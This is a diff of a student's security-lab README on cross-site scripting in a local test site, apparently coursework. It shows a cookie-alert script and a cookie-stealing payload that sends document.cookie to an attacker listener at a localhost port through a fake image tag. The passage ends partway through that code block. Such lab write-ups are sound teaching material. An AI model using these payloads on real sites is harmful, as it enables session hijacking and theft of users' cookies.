chris-tse/CS4173-Lab5/README.md

 ## Task 2: Posting a Malicious Message to Display Cookies

-Now that we can use XSS on this system, we can now start attempting to grab private user data, in particular cookies.
+Now that we can use XSS on this system, we can now start attempting to grab private user data such as cookies for example.
 We can modify the script above to do so:

 ```html
 <script>alert(document.cookie);</script>
 ```

+Now when a visitor arrives at Samy's profile, they will see an alert box with their session cookie inside.

 ## Task 3: Stealing Cookies from the Victim’s Machine

 With the above method, we can alert the cookies to the user's screen, but the attacker is not yet able to view this information.
-In order to transfer this data to the attacker, they can use a malicioius HTTP GET request, for example with a fake image.
+In order to transfer this data to the attacker, they can use a malicious HTTP GET request, for example with a fake image.
 We can append the information to this request which goes to the attacker's machine.
 In this example, we are using the localhost IP address since we are testing on the same machine:

 ```html
 <script>document.write('<img src="http://127.0.0.1:5555?c=' + escape(document.cookie) + '>')</script>